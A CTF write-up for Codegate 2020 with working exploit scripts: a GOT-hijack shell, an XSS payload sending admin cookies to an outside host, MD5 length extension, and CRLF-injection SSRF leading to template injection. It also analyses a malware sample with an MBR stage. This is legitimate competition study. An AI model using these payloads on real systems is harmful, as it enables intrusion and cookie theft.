Codegate CTF 2020 Preliminary
Pwn
Babyllvm
When rel_pos == 0, is_safe always returns True. We can modify data_ptr in one block and read/write in another block to bypass the bounds check, which gives arbitrary read/write. Then we leak a libc address and hijack the GOT to control PC and get a shell.
from pwn import *
#r = remote("localhost",4444)
r = remote("58.229.240.181", 7777)
payload = ",[]<<<<<<<<[-]<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<.>.>.>.>.>.>.>.>,>,>,>,>,>,>,>,>"
r.sendlineafter(">>>",payload)
r.recvrepeat(1)
r.send("\x00")
libc = u64(r.recvuntil("\x7f")[-6:]+"\x00\x00") - 0x110070
print hex(libc)
r.send(p64(libc+0x10a38c))
r.sendlineafter(">>>","<-")
r.interactive()
Web
CSP
The objective is to steal admin's cookie. We are given the source code:
<!DOCTYPE html>
<html>
<head>
<title>Advanced Echo Service</title>
</head>
<body>
<!-- TODO: implement form to support multiple APIs in same time -->
<form action="view.php" method="GET">
<p>API Name (Required): </p>
<input name="name" type="text" required />
<p>API Param#1 (Optional) : </p>
<input name="p1" type="text" />
<p>API Param#2 (Optional) : </p>
<input name="p2" type="text" />
<button type="submit">Submit</button>
</form>
<br />
<p>
If you find a bug, please <a href="/report.php">report</a>!
</p>
</body>
</html>
<?php
require_once 'config.php';
if(!isset($_GET["q"]) || !isset($_GET["sig"])) {
die("?");
}
$api_string = base64_decode($_GET["q"]);
$sig = $_GET["sig"];
if(md5($salt.$api_string) !== $sig){
die("??");
}
//APIs Format : name(b64),p1(b64),p2(b64)|name(b64),p1(b64),p2(b64) ...
$apis = explode("|", $api_string);
foreach($apis as $s) {
$info = explode(",", $s);
if(count($info) != 3)
continue;
$n = base64_decode($info[0]);
$p1 = base64_decode($info[1]);
$p2 = base64_decode($info[2]);
if ($n === "header") {
if(strlen($p1) > 10)
continue;
if(strpos($p1.$p2, ":") !== false || strpos($p1.$p2, "-") !== false) //Don't trick...
continue;
header("$p1: $p2");
}
elseif ($n === "cookie") {
setcookie($p1, $p2);
}
elseif ($n === "body") {
if(preg_match("/<.*>/", $p1))
continue;
echo $p1;
echo "\n<br />\n";
}
elseif ($n === "hello") {
echo "Hello, World!\n";
}
}
Also, the CSP default-src 'self'; script-src 'none'; base-uri 'none'; is very strict. It's too difficult to execute JavaScript under that constraint. Therefore, the idea here is to abuse header or setcookie to somehow strip out this CSP.
But header has some limitations here: the key length is capped at 10 and characters such as : and - are not allowed. It's too hard to do any tricks here.
Let's check header()'s doc first.
There are two special-case header calls. The first is a header that starts with the string "HTTP/" (case is not significant), which will be used to figure out the HTTP status code to send....
That is cool, so we can probably manipulate the response code. After a few tries, we accidentally found that some status codes (103, 123, 300 ...) lead to no CSP at all. This is due to nginx's behavior. You can read our discussion here on Twitter. The community is just amazing!
Next, we have to bypass the preg_match("/<.*>/", $p1) filter. This one is simple: . does not match a newline by default, so we can inject a newline before the >.
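The newline trick can be checked offline. Python's re module has the same default as PCRE without the s modifier, so the following is a minimal sketch of the filter; the helper name is_blocked and the sample strings are made up for illustration.

```python
import re

# Same pattern as the PHP filter. Like PCRE without the /s modifier,
# Python's "." does not match "\n" unless re.DOTALL is passed.
FILTER = re.compile(r"<.*>")


def is_blocked(body):
    """Return True when the filter would reject this body."""
    return FILTER.search(body) is not None


plain = "<script>alert(1)</script>"
split = "<script\n>alert(1)</script\n>"

print(is_blocked(plain))  # tag opens and closes on one line
print(is_blocked(split))  # every ">" sits on a different line than its "<"
```

Browsers accept whitespace, including a newline, before the closing > of a tag, so the split form is still parsed as markup.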
The last one is the MD5 length extension attack. Since the API only provides a signature for one single command, we have to extend it to two commands (header and body). This part was done by @nkhg :)
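For readers who have not seen length extension before, here is a minimal pure-Python sketch of what a tool like hashpump does. It is not the code we used. The function names (md5_pad, compress, length_extend) and the demo salt are hypothetical; only the MD5 round structure is standard.

```python
import hashlib
import math
import struct

MASK = 0xFFFFFFFF
# Standard MD5 per-round shift amounts and sine-derived constants.
S = [7, 12, 17, 22] * 4 + [5, 9, 14, 20] * 4 + [4, 11, 16, 23] * 4 + [6, 10, 15, 21] * 4
K = [int(abs(math.sin(i + 1)) * 2 ** 32) & MASK for i in range(64)]


def rol(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


def md5_pad(length):
    """Padding MD5 appends to a message of `length` bytes."""
    return b"\x80" + b"\x00" * ((55 - length) % 64) + struct.pack("<Q", length * 8)


def compress(state, block):
    """One MD5 compression step over a 64-byte block."""
    a, b, c, d = state
    m = struct.unpack("<16I", block)
    for i in range(64):
        if i < 16:
            f, g = (b & c) | (~b & d), i
        elif i < 32:
            f, g = (d & b) | (~d & c), (5 * i + 1) % 16
        elif i < 48:
            f, g = b ^ c ^ d, (3 * i + 5) % 16
        else:
            f, g = c ^ (b | ~d), (7 * i) % 16
        f = (f + a + K[i] + m[g]) & MASK
        a, d, c = d, c, b
        b = (b + rol(f, S[i])) & MASK
    return [(x + y) & MASK for x, y in zip(state, (a, b, c, d))]


def length_extend(sig_hex, known_len, extra):
    """Given md5(secret + data) and len(secret + data), sign data + glue + extra."""
    state = list(struct.unpack("<4I", bytes.fromhex(sig_hex)))
    glue = md5_pad(known_len)
    tail = extra + md5_pad(known_len + len(glue) + len(extra))
    for off in range(0, len(tail), 64):
        state = compress(state, tail[off:off + 64])
    return struct.pack("<4I", *state).hex(), glue


# Demo with a made-up 12-byte salt; the attacker only needs its length.
salt, data, extra = b"hypothetical", b",,", b"|appended"
sig = hashlib.md5(salt + data).hexdigest()
new_sig, glue = length_extend(sig, len(salt) + len(data), extra)
print(new_sig == hashlib.md5(salt + data + glue + extra).hexdigest())
```

The forged q parameter is then data + glue + extra. The glue bytes land inside a chunk that the explode(",") count check skips, so only the appended commands are interpreted.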
Here is the full payload. I don't know why fetch won't work in the remote headless Chrome, so I use <img> instead.
#!/usr/bin/env python3
import base64

import hashpumpy
import requests


def b64e(s):
    return base64.b64encode(s.encode()).decode()


def b64d(s):
    return base64.b64decode(s.encode())


s = requests.session()
# Commands appended after the signed one: a header call that sets the
# status line, then a body call carrying the markup.
target = '|' + ','.join([
    b64e('header'),
    b64e('HTTP/1.1'),
    b64e('300'),
]) + '|' + ','.join([
    b64e('body'),
    b64e('<img id="img"\n></img\n><script\n>document.getElementById("img").src="//255.255.255.255:13337/?"+document.cookie;</script\n>'),
    b64e('dontCare')
])
tmp = target.encode('ascii')
print(tmp)
for i in range(12, 13):  # i is the salt length
    #r = hashpumpy.hashpump('f43646db31566ccb3f624f46aac80b53', ',,YQ==', tmp, i)
    r = hashpumpy.hashpump('7f104404b0d414d18ab3efb831e333d7', ',,', tmp, i)
    t = base64.b64encode(r[1])
    #print(t)
    #print(i, r)
    p = s.get('http://110.10.147.166/api.php', params=dict(sig=r[0], q=t))
    print(p.url)
    if p.content != b'??':
        print('solved!')
        print(t, r[0])
        print(p.status_code)
        for k, v in p.headers.items():
            print(k, ':', v)
        print(p.content)
        break
Train of Thought
- Find the most exploitable path here: setcookie and header to strip out the CSP.
- Learn from the documentation that header can be used to control the HTTP status code.
- Do some random testing (fuzzing) to see if we can manipulate the headers.
Failed Attempts
- CRLF injection: header seems to have been vulnerable to this back in 2002. In the latest PHP, both setcookie and header filter out invalid characters.
- Bypass the PHP length check and strpos: I can't come up with an approach to bypass them.
- DNS rebinding: not useful when dealing with cookies because of the incorrect domains.
renderer
In this challenge we only have the Dockerfile. The Python and shell scripts it refers to are not included in the given source code.
FROM python:2.7.16
ENV FLAG CODEGATE2020{**DELETED**}
RUN apt-get update
RUN apt-get install -y nginx
RUN pip install flask uwsgi
ADD prob_src/src /home/src
ADD settings/nginx-flask.conf /tmp/nginx-flask.conf
ADD prob_src/static /home/static
RUN chmod 777 /home/static
RUN mkdir /home/tickets
RUN chmod 777 /home/tickets
ADD settings/run.sh /home/run.sh
RUN chmod +x /home/run.sh
ADD settings/cleaner.sh /home/cleaner.sh
RUN chmod +x /home/cleaner.sh
CMD ["/bin/bash", "/home/run.sh"]
So we need to do some obnoxious black-box tricks here :/
The server is a proxy service using Python-urllib/2.7, based on Flask + uWSGI. It can issue GET requests to an arbitrary endpoint. After some black-box fuzzing, we found the endpoint http://127.0.0.1/renderer/admin. There is a link on that admin page: /static/img/admin.jpg.
However, visiting the link returns a 404 Not Found from nginx. This is kind of strange because by default /static should be handled by Flask itself.
There is also an nginx path traversal bug, which allows us to get the source of the remote server. For this bug you can read this article (in English) or this one (in Simplified Chinese). This bug requires some guessing in my opinion, so if you fail to find it, don't blame yourself. The author should have attached the nginx config file to the given source code, rather than asking challengers to guess.
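The writeup does not show the nginx config, so the following is only a sketch under an assumption: that the bug is the common alias misconfiguration where the location has no trailing slash but the alias does (for example location /static with alias /home/static/). The function resolve_alias and both default values are hypothetical; the /home/static and /home/src paths come from the Dockerfile.

```python
import posixpath


def resolve_alias(uri, location="/static", alias="/home/static/"):
    """Model how nginx maps a URI to a file for an alias location.

    nginx replaces the matched location prefix with the alias string.
    With no trailing slash on the location, "/static../x" still matches
    the prefix and becomes "/home/static/../x".
    """
    if not uri.startswith(location):
        return None
    raw_path = alias + uri[len(location):]
    # normpath only shows where the filesystem would end up.
    return raw_path, posixpath.normpath(raw_path)


print(resolve_alias("/static/img/admin.jpg"))
print(resolve_alias("/static../src/run.py"))
```

Under that assumed config, a request starting with /static.. escapes one directory up, which is enough to reach the application source next to the static folder.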
It's worth mentioning that this is probably the 5th or 6th time I have encountered this bug in 2019 and 2020 CTFs ......
We get the full source code by inferring the file paths from uwsgi.ini and run.py:
from flask import Flask, render_template, render_template_string, request, redirect, abort, Blueprint
import urllib2
import time
import hashlib
from os import path
from urlparse import urlparse

front = Blueprint("renderer", __name__)

@front.before_request
def test():
    print(request.url)

@front.route("/", methods=["GET", "POST"])
def index():
    if request.method == "GET":
        return render_template("index.html")
    url = request.form.get("url")
    res = proxy_read(url) if url else False
    if not res:
        abort(400)
    return render_template("index.html", data = res)

@front.route("/whatismyip", methods=["GET"])
def ipcheck():
    return render_template("ip.html", ip = get_ip(), real_ip = get_real_ip())

@front.route("/admin", methods=["GET"])
def admin_access():
    ip = get_ip()
    rip = get_real_ip()
    if ip not in ["127.0.0.1", "127.0.0.2"]: #super private ip :)
        abort(403)
    if ip != rip: #if use proxy
        ticket = write_log(rip)
        return render_template("admin_remote.html", ticket = ticket)
    else:
        if ip == "127.0.0.2" and request.args.get("body"):
            ticket = write_extend_log(rip, request.args.get("body"))
            return render_template("admin_local.html", ticket = ticket)
        else:
            return render_template("admin_local.html", ticket = None)

@front.route("/admin/ticket", methods=["GET"])
def admin_ticket():
    ip = get_ip()
    rip = get_real_ip()
    if ip != rip: #proxy doesn't allow to show ticket
        print 1
        abort(403)
    if ip not in ["127.0.0.1", "127.0.0.2"]: #only local
        print 2
        abort(403)
    if request.headers.get("User-Agent") != "AdminBrowser/1.337":
        print request.headers.get("User-Agent")
        abort(403)
    if request.args.get("ticket"):
        log = read_log(request.args.get("ticket"))
        if not log:
            print 4
            abort(403)
        return render_template_string(log)

def get_ip():
    return request.remote_addr

def get_real_ip():
    return request.headers.get("X-Forwarded-For") or get_ip()

def proxy_read(url):
    #TODO : implement logging
    s = urlparse(url).scheme
    if s not in ["http", "https"]: #sjgdmfRk akfRk
        return ""
    return urllib2.urlopen(url).read()

def write_log(rip):
    tid = hashlib.sha1(str(time.time()) + rip).hexdigest()
    with open("/home/tickets/%s" % tid, "w") as f:
        log_str = "Admin page accessed from %s" % rip
        f.write(log_str)
    return tid

def write_extend_log(rip, body):
    tid = hashlib.sha1(str(time.time()) + rip).hexdigest()
    with open("/home/tickets/%s" % tid, "w") as f:
        f.write(body)
    return tid

def read_log(ticket):
    if not (ticket and ticket.isalnum()):
        return False
    if path.exists("/home/tickets/%s" % ticket):
        with open("/home/tickets/%s" % ticket, "r") as f:
            return f.read()
    else:
        return False
I don't know what write_extend_log, 127.0.0.2, and admin_local are used for. Anyway:
- The objective is to reach render_template_string for RCE or to read config, because the flag is in config.
- get_real_ip gets the IP address from a user-controlled HTTP header, X-Forwarded-For.
- According to the Dockerfile, this Python urllib is vulnerable to CRLF injection.
The first one, renderer/admin, should be easy to do. The real problem is the second one, the User-Agent check, because urllib2 will also append its own User-Agent to the HTTP headers. I tried injecting \r\n\r\n to make that header become part of the HTTP body, but nginx considers that an invalid request and thus replies with HTTP 400.
After more fuzzing, I found that the HTTP version is somehow related to this behavior. Injecting \r\n\r\n with HTTP/1.1 does not work for me; however, to my surprise, HTTP/1.0 works well here. The reason seems to be related to the Host: header. In order to make it work with HTTP/1.1, you need to inject Host: 127.0.0.1\r\n. I don't know if the root cause is the RFC or nginx, and I'm not really sure how nginx parses these chaotic headers. Please let me know by creating a GitHub issue if you have anything in mind.
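To see why the Host: header matters, here is a simplified model of the raw request after the injection. It is a sketch, not urllib2's real code: build_request, parse_head, the header order, and the placeholder ticket TID are assumptions made for illustration.

```python
def build_request(selector, host="127.0.0.1"):
    """Simplified model of the bytes urllib2/httplib sends for a GET.

    The selector is pasted into the request line unescaped, which is
    what makes the CRLF injection possible.
    """
    lines = [
        "GET %s HTTP/1.1" % selector,
        "Accept-Encoding: identity",
        "Host: %s" % host,
        "Connection: close",
        "User-Agent: Python-urllib/2.7",
    ]
    return "\r\n".join(lines) + "\r\n\r\n"


def parse_head(raw):
    """Read the request the way a server does: stop at the first blank line."""
    head = raw.split("\r\n\r\n", 1)[0].split("\r\n")
    headers = {}
    for line in head[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return head[0], headers


injected = ("/renderer/admin/ticket?ticket=TID HTTP/1.0\r\n"
            "User-agent: AdminBrowser/1.337\r\n\r\nA:")
request_line, headers = parse_head(build_request(injected))
print(request_line)
print(headers)
```

In this model the injected blank line pushes the genuine Host: and User-Agent: lines out of the header block, so the server sees our User-Agent but no Host at all. RFC 7230 section 5.4 says a server must answer 400 to an HTTP/1.1 request that lacks a Host header, while HTTP/1.0 has no such requirement, which would be consistent with what we observed.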
Btw, HTTP version trick also appears in Plaid CTF 2019.
Here is my final payload:
#!/usr/bin/env python3
import requests
import re
s = requests.session()
url = 'http://127.0.0.1/renderer/admin HTTP/1.1\r\nX-Forwarded-For:{{config}}YOLOzzw\r\n'
r = s.post('http://58.229.253.144/renderer/', data=dict(url=url))
print(r.text)
tid = re.findall('([0-9a-f]{40})', r.text)[0]
url = f'http://127.0.0.1/renderer/admin/ticket?ticket={tid} HTTP/1.0\r\nUser-agent: AdminBrowser/1.337\r\n\r\nA:'
r = s.post('http://58.229.253.144/renderer/', data=dict(url=url))
print(r.text, r.status_code)
Train of Thought
- Guess the nginx path traversal trick to retrieve the source code
- Find out that the Python version is vulnerable to HTTP header injection by virtue of CRLF injection
Crypto
Halffeed
pt = b'\x00'*11 + b';cat ' + b'a'*16
ct1, _ = get_enc(pt)
t1 = sxor(ct1[16:], pt[16:])
pt = b'flag;' + b'd'*11
t2, ct2 = feed_plus(t1, pt)
pt = b'b'*16 + b'e'*16
ct, _ = get_enc(pt)
t3 = sxor(ct[16:], pt[16:])
pt = b'b'*16 + sxor(t2[:8], t3[:8]) + b'd'*8
_, tag = get_enc(pt)
ct = ct1[:16] + ct2
do_exec(0, ct, tag)
# CODEGATE2020{F33D1NG_0N1Y_H4LF_BL0CK_W1TH_BL0CK_C1PH3R}
Munch
In this task, we have a flag encrypted with RSA and some info about one of its primes, p:
- The prime p is split into 7 parts:
  - [74bits] [35bits] [111bits] [35bits] [111bits] [35bits] [111bits]
  - Remove those 35-bit parts
- We can get the 52 MSBs of y = part[i] * seed**(16 * k) mod m, where k runs from 0 to 50, and we know what the seed is.
We can reconstruct those parts with the LLL algorithm. Consider the following matrix:
M = [diag(seed^(16*k)) diag(y<<shift) I m*I]
we know that:
M * [part[i] -1 truncated_LSBs modulo_parts] = 0
And we can find that vector by reducing a basis of the right kernel of M.
After we get those bits of the prime p, we can reconstruct the missing 35-bit parts using multivariate Coppersmith.
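The kernel relation can be spelled out per sample: row k of M is (seed^(16k), y_k << shift, e_k, m * e_k), and the kernel vector is (part, -1, -low, -q). The sketch below only verifies that identity on made-up toy values; it does not run LLL. The modulus, the seed, the sign convention, and the function names are all assumptions.

```python
def sample_rows(part, seed, m, known_bits=52, samples=51):
    """For k = 0..samples-1, split y_k into known MSBs and unknown LSBs."""
    shift = m.bit_length() - known_bits
    rows = []
    for k in range(samples):
        s_k = pow(seed, 16 * k, m)
        y = part * s_k % m
        high = y >> shift            # the leaked 52 MSBs
        low = y - (high << shift)    # truncated LSBs (unknown to the solver)
        q = (part * s_k - y) // m    # quotient hidden by "mod m"
        rows.append((s_k, high << shift, low, q))
    return shift, rows


def relation_holds(part, m, rows):
    """Check s_k*part - (high << shift) - low - m*q == 0 for every sample."""
    return all(s_k * part - hs - low - m * q == 0 for s_k, hs, low, q in rows)


# Hypothetical toy parameters: a 111-bit part and a 127-bit modulus.
toy_m = (1 << 127) - 1
toy_part = (1 << 110) + 12345
toy_seed = 0x1234567
toy_shift, toy_rows = sample_rows(toy_part, toy_seed, toy_m)
print(relation_holds(toy_part, toy_m, toy_rows))
```

The unknown entries (low and q) are small compared with m, which is why a reduced basis of the kernel is expected to expose them together with part.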
Polynomial
The encryption algorithm is NTRU, and we can find some attacks on insecure parameters in its original paper. The weaker instance can be solved by applying LLL to the public key to find the private key, but that doesn't work on the stronger one. To solve both of them, I use another attack that recovers the plaintext directly from the ciphertext. Consider the following lattice:
H = Matrix(ZZ, h.matrix())
C = Matrix(ZZ, [outputs.list()])
I, O = identity_matrix, zero_matrix
nr, nc = H.nrows(), H.ncols()
L = Matrix.block([
[a * I(nr, nc), H ],
[ O(nr, nc), q * I(nr, nc)],
[ O(1, nc), C ],
])
(ar, m) is in the lattice, and we can find it with the LLL algorithm.
Misc
Verifier
i = 0;
j = 0;
ans = 3;
[ i < 10 { j = j + 1 ; j > 6 ? { ans = ans - 1 ; i = i + 1 } : { i = i + 1 } } ];
!ans
Rev
ORM-APP
Reverse the emulator
We have an emulator binary and a binary for its custom ISA. The code structure of the emulator is quite simple. It just takes a lot of human effort to figure out the definition of each opcode.
__int64 __fastcall main(__int64 a1, char **argv, char **a3)
{
task cpu; // [rsp+10h] [rbp-40h]
unsigned __int64 v5; // [rsp+48h] [rbp-8h]
v5 = __readfsqword(0x28u);
if ( (signed int)a1 <= 1 )
usage((__int64)*argv);
unbuffering();
load(argv[1], &cpu);
if ( !cpu.bin_info )
{
fwrite("fatal: fail to initialize ORM.\n", 1uLL, 0x1FuLL, stderr);
exit(-1);
}
run_emu(&cpu);
return 0LL;
}
void __fastcall run_emu(task *cpu)
{
while ( !(unsigned int)run(cpu) )
;
switch ( -cpu->errno )
{
case 0:
fwrite("ORM halted.\n", 1uLL, 0xCuLL, stderr);
exit(0);
return;
case 1:
fwrite("Invalid opcode.\n", 1uLL, 0x10uLL, stderr);
break;
case 2:
fwrite("Segmentation fault.\n", 1uLL, 0x14uLL, stderr);
break;
case 3:
fwrite("Invalid State.\n", 1uLL, 0xFuLL, stderr);
break;
case 4:
fwrite("Device error.\n", 1uLL, 0xEuLL, stderr);
break;
}
exit(-1);
}
__int64 __fastcall run(task *cpu)
{
int v1; // eax
unsigned __int8 opcode; // [rsp+1Fh] [rbp-1h]
opcode = get_data(cpu);
v1 = cpu->x64_x32;
if ( v1 == 4 )
return operation_32[opcode >> 3](cpu, (opcode >> 2) & 1, opcode & 3);
if ( v1 == 8 )
return operation_64[opcode >> 3](cpu, (opcode >> 2) & 1, opcode & 3);
cpu->errno = -3;
return 1LL;
}
.data:0000000000213120 ; __int64 (__fastcall *operation_64[32])(task *task, char flag, unsigned __int8 a3)
.data:0000000000213120 operation_64 dq offset nop ; DATA XREF: run+89↑o
.data:0000000000213120 ; run+90↑r
.data:0000000000213120 dq offset push
.data:0000000000213120 dq offset pop
.data:0000000000213120 dq offset neg
.data:0000000000213120 dq offset add
.data:0000000000213120 dq offset sub
.data:0000000000213120 dq offset mul
.data:0000000000213120 dq offset div
.data:0000000000213120 dq offset mod
.data:0000000000213120 dq offset unsign_rshift
.data:0000000000213120 dq offset sign_rshift
.data:0000000000213120 dq offset lshift
.data:0000000000213120 dq offset and
.data:0000000000213120 dq offset or
.data:0000000000213120 dq offset xor
.data:0000000000213120 dq offset equl
.data:0000000000213120 dq offset nequl
.data:0000000000213120 dq offset unsign_b
.data:0000000000213120 dq offset unsign_beq
.data:0000000000213120 dq offset sign_b
.data:0000000000213120 dq offset sign_beq
.data:0000000000213120 dq offset jmp
.data:0000000000213120 dq offset jz
.data:0000000000213120 dq offset jnz
.data:0000000000213120 dq offset set_adr
.data:0000000000213120 dq offset sub_E298
.data:0000000000213120 dq offset call
.data:0000000000213120 dq offset write_mem
.data:0000000000213120 dq offset write_reg
.data:0000000000213120 dq offset read_mem
.data:0000000000213120 dq offset set_err
.data:0000000000213120 dq offset set_err
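The dispatch in run can be mirrored in a few lines of Python, which is handy when annotating the ISA binary by hand. This is a sketch: the handler names are the ones we assigned in the table above, the decode helper is hypothetical, and it assumes operation_32 uses the same ordering as operation_64.

```python
# Handler names in table order; the index is opcode >> 3.
HANDLERS = [
    "nop", "push", "pop", "neg", "add", "sub", "mul", "div",
    "mod", "unsign_rshift", "sign_rshift", "lshift", "and", "or", "xor", "equl",
    "nequl", "unsign_b", "unsign_beq", "sign_b", "sign_beq", "jmp", "jz", "jnz",
    "set_adr", "sub_E298", "call", "write_mem", "write_reg", "read_mem",
    "set_err", "set_err",
]


def decode(opcode):
    """Split one opcode byte the way run() does.

    Returns (handler name, 1-bit flag, 2-bit operand selector).
    """
    if not 0 <= opcode <= 0xFF:
        raise ValueError("opcode must fit in one byte")
    return HANDLERS[opcode >> 3], (opcode >> 2) & 1, opcode & 3


print(decode(0x0C))
```

What the flag bit and the low two bits mean differs per handler and still has to be read out of each routine.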
Exploit the program
After we got the definition of the opcodes, we wrote an IDA loader and processor module to reverse the challenge program. The disassembler is far from perfect, but we can guess what the program does from its structure.
Its main function is quite simple: it is just a switch on our input that calls the corresponding routine.
First of all, let's find where the flag-related parts are:
SEG3:90909090909091A8 aMigratingCenso:db "[+] Migrating ====== CENSORED: FLAG LOCATED HERE. ======"
write(1, aMigratingCenso, 0xE);
The specified length (0xE) means the flag is not printed in the normal case, so we need to find some vulnerability to leak that memory.
The first bug we found is in the add routine. It doesn't check how many projects have been created, so the projects array overflows.
The memory layout looks like:
SEG4:A0A0A0A0A0A0A000 ; Segment type: Pure data
SEG4:A0A0A0A0A0A0A000 input: dq 0 ; DATA XREF: show+2E↑r
SEG4:A0A0A0A0A0A0A000 ; show+49↑r ...
SEG4:A0A0A0A0A0A0A008 align 0x1000
SEG4:A0A0A0A0A0A0B000 project_count: dq 0 ; DATA XREF: get_project+4↑r
SEG4:A0A0A0A0A0A0B000 ; add+1↑r ...
SEG4:A0A0A0A0A0A0B008 projects: dq 8 dup(0) ; DATA XREF: get_project+1A↑r
SEG4:A0A0A0A0A0A0B008 ; add+26↑r ...
SEG4:A0A0A0A0A0A0B048 data: dq 0 ; DATA XREF: add+3B↑r
SEG4:A0A0A0A0A0A0B048 ; migrate+D9↑r
SEG4:A0A0A0A0A0A0B050 align 0x1000
SEG4:A0A0A0A0A0A0B050 ; end of 'SEG4'
SEG4:A0A0A0A0A0A0B050
projects is an array of pointers, each pointing to its corresponding data. data is an array of the following structure:
char name[8];
char description[0x80];
uint64_t is_migrated;
So after the overflow, the name of the first project is overwritten with some address, which makes the string longer because its null terminator is overwritten.
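The overlap follows directly from the addresses in the listing. The sketch below is plain arithmetic on those addresses; the constant and function names are hypothetical, and which add call actually reaches the out-of-bounds slot depends on how the program indexes the array, which the listing does not show.

```python
# Addresses taken from the SEG4 listing above.
PROJECTS = 0xA0A0A0A0A0A0B008   # projects: dq 8 dup(0)
DATA = 0xA0A0A0A0A0A0B048       # data: first project record
SLOTS = 8                       # number of pointers reserved

# Record layout: name[8], description[0x80], is_migrated (uint64).
NAME_SIZE, DESC_SIZE, FLAG_SIZE = 8, 0x80, 8
RECORD_SIZE = NAME_SIZE + DESC_SIZE + FLAG_SIZE


def slot_address(index):
    """Address of projects[index]; each slot is an 8-byte pointer."""
    return PROJECTS + 8 * index


# The first slot past the array is exactly the name field of record 0.
print(hex(slot_address(SLOTS)), hex(DATA))
```

Because a pointer stored there fills all 8 bytes of name, printing that name runs on into the description field.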
The second bug we found is that the program segfaults when we call migrate on the overflowed project. We hooked the emulator to figure out which instruction caused the segfault. Surprisingly, the reason is that the program counter ends up in a non-executable data segment.
We found that the root cause is the strcpy in migrate, which overflows the stack.
Now the path to our flag is clear: change the return address to the flag-printing gadget and win :)
Here is the exploit:
from pwn import *

p = remote("110.10.147.39", 31337)


def Add(name, des):
    p.sendafter(b">>> ", b'A')
    p.sendafter(b"):", name)
    p.sendafter(b"):", des)


# The first description carries the address we want as the return address.
Add(b'0', p64(0x80808080808084B6))
for _ in range(7):
    Add(b'0', b'trash')
# Migrate project 0 so that strcpy copies the over-long name onto the stack.
p.sendafter(b">>> ", b'M')
p.sendafter(b":", b'0')
p.sendafter(b":", b"trash")
flag = p.recvuntil(b"\x00")
print(flag)
malicious
Looks very simple. The function at 0x403ED2 is useless, so patch it out.
The function at 0x403f8c connects to an HTTP server on 195.157.15.100:818 to ask for a token. The token is used as the first argument to the md5 function, which is not just a hash function: it also affects the result of the shellcode in the next step. The md5 result should be d4ee0fbbeb7ffd4fd7a7d477a7ecd922, which is the md5 of activate.
Then the function at 0x403DB1 decrypts the shellcode, which was encrypted with Camellia or something similar. That's not important; the result is only affected by the token from the previous step.
int sub_403F8C()
{
struct sockaddr name; // [esp+18h] [ebp-1B0h]
struct WSAData WSAData; // [esp+28h] [ebp-1A0h]
void *Buf1; // [esp+1B8h] [ebp-10h]
SOCKET s; // [esp+1BCh] [ebp-Ch]
WSAStartup(0x202u, &WSAData);
s = socket(2, 1, 0);
memset(&name, 0, 0x10u);
name.sa_family = 2;
*(_DWORD *)&name.sa_data[2] = inet_addr("195.157.15.100");
*(_WORD *)name.sa_data = htons(0x332Cu);
if ( connect(s, &name, 16) )
return 0;
send(s, "GET /status HTTP/1.1\r\n", 22, 0);
recv(s, token, 8, 0);
Buf1 = md5(token, 8u);
return memcmp(Buf1, &md5_hash, 0x10u);
}
The decrypted shellcode is an MBR (the program base is 0x7c00). It copies itself to 0x600, decrypts itself by XOR with 0xF4, then jumps to 0x630.
Then the MBR uses BIOS interrupt call 0x1A to get the current date. The value of cx:dx looks like 0x2020:0x0208. The MBR checks that the year is greater than or equal to 0x30, or it prints Not a chance.
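The cx:dx value is packed BCD. Assuming the MBR calls INT 1Ah with AH=04h (read RTC date), CH is the century, CL the year, DH the month and DL the day. The sketch below decodes such a value; the helper names are hypothetical, and comparing the CL byte against 0x30 is our reading of the check.

```python
def bcd(byte):
    """Decode one packed-BCD byte, two decimal digits per byte."""
    return (byte >> 4) * 10 + (byte & 0x0F)


def decode_rtc_date(cx, dx):
    """Turn the cx:dx pair into (year, month, day)."""
    century, year = bcd(cx >> 8), bcd(cx & 0xFF)
    month, day = bcd(dx >> 8), bcd(dx & 0xFF)
    return century * 100 + year, month, day


def passes_year_check(cx, threshold=0x30):
    """Assumed form of the check: the BCD year byte must be >= 0x30."""
    return (cx & 0xFF) >= threshold


print(decode_rtc_date(0x2020, 0x0208))
print(passes_year_check(0x2020))
```

So on the contest date the check fails, and the binary has to be patched or the clock moved forward to the year 2030 or later.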
After that check, there is a loop:
for di in range(0xdead):
    for si in range(0xbeef):
        write sectors [1:32] on disk to memory 0x1000
        concat sector [0] on disk after that (0x5000, a sector is 0x200)
        overwrite the sectors[0:32] on disk with memory start from 0x1000
extract the bytes of flag on each sector and print out
The sector order after each iteration looks like this:
#1
[1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 0]
#2
[2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 0, 1]
#3
[3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 0, 1, 2]
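Each iteration rotates the 33 sectors by one position, so only the iteration count modulo 33 matters. Patching di to 1 and si to (0xdead*0xbeef)%33 gives the same final layout without the long wait, and then we get the flag: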
CODEGATE2020{8_bits_per_byte_1_byte_per_sector}
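The reduction of the loop count can be checked with a small simulation. This is a sketch that models each sector as its index only; the function name rotate is hypothetical.

```python
from collections import deque

SECTORS = 33  # sectors 1..32 plus sector 0 appended at the end


def rotate(layout, times):
    """Apply the loop body `times` times: the first sector moves to the end."""
    d = deque(layout)
    d.rotate(-times)
    return list(d)


start = list(range(SECTORS))
total = 0xdead * 0xbeef
reduced = total % SECTORS

print(rotate(start, 1)[:3], rotate(start, 1)[-1])
print(reduced)
print(rotate(start, total) == rotate(start, reduced))
```

After 33 iterations the disk is back in its original order, so running the reduced count gives the same layout as the full 0xdead * 0xbeef iterations.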